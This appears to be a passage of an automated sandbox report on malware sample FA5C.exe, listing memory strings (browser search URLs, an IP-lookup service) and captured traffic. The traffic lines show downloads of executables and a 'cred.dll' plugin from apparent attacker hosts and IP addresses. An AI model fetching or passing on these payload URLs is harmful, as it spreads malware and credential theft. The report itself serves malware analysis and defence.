                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: FA5C.exe, 00000027.00000002.953499141.0000000002EF0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: FA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: FA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953499141.0000000002EF0000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: FA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: FA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: FA5C.exe, 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                          Source: FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: svchost.exe, 00000016.00000003.793370380.000001A784B89000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793597944.000001A785002000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793450984.000001A784BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6236.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/bd39b08a69ef2a6dac4b951657d49c6ecf7db331 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
